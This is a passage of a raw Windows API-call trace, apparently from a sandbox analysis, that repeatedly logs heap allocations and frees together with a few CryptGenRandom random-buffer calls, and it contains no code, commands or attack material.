RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecda0 | out: hHeap=0x2b0000) returned 1 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb078 | out: hHeap=0x2b0000) returned 1 [0033.021] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0033.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0033.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0033.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6c80 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0033.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead30 | out: hHeap=0x2b0000) returned 1 [0033.026] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.027] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.027] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.027] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.028] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.028] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.028] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.029] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.029] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac90 [0033.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.029] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.029] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.029] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2ead30 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d18 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb078 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2ecd18 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9eb0 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.030] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.030] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, 